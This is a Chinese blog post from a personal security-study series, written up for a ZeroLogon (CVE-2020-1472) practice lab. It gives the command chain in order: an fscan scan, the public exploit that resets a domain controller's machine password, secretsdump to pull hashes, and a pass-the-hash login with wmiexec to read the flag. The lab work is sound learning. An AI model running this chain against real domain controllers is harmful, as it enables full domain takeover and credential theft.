ARTICLE DETAIL

资讯详情

深耕网站建设、视觉设计与SEO优化的一线实战洞察。

无境ZeroLogon 练习 wp

无境ZeroLogon 练习 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

  • 前文链接
  • writeup

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 记一次从外网打通AWS云
  29. 内网渗透初探
  30. 记对外国某服务器的内网渗透
  31. 一次丝滑的内网渗透拿下域控
  32. 实战内网PTH上线域控
  33. 通过路由器进行内网渗透
  34. 钓鱼邮件和钓鱼样本
  35. 无境vulntarget-a wp

writeup

目标地址是192.168.111.100,挂好vpn用fscan快速扫描

fscanPlus_amd64-h192.168.111.100-np


域控机,用zerologon直接打
impacket:https://github.com/maaaaz/impacket-examples-windows
CVE-2020-1472:https://github.com/dirkjanm/CVE-2020-1472

python cve-2020-1472-exploit.py masterpc192.168.111.100

等进度条跑完,域控机密码就重置了

然后用impacket工具包里的secretsdump导出hash

secretsdump.exe myd.com/masterpc$@192.168.111.100 -no-pass -just-dc


拿到管理员hash:ec0df45863a3751d56ba6df1e72f7218

使用工具包里的wmiexec连上去即可

wmiexec.exe myd.com/Administrator@192.168.111.100-hashesaad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218


flag就在根目录下

moreflag.txt


得到flag为:48255d2fc759b14f4127fda7c5a86d89

返回列表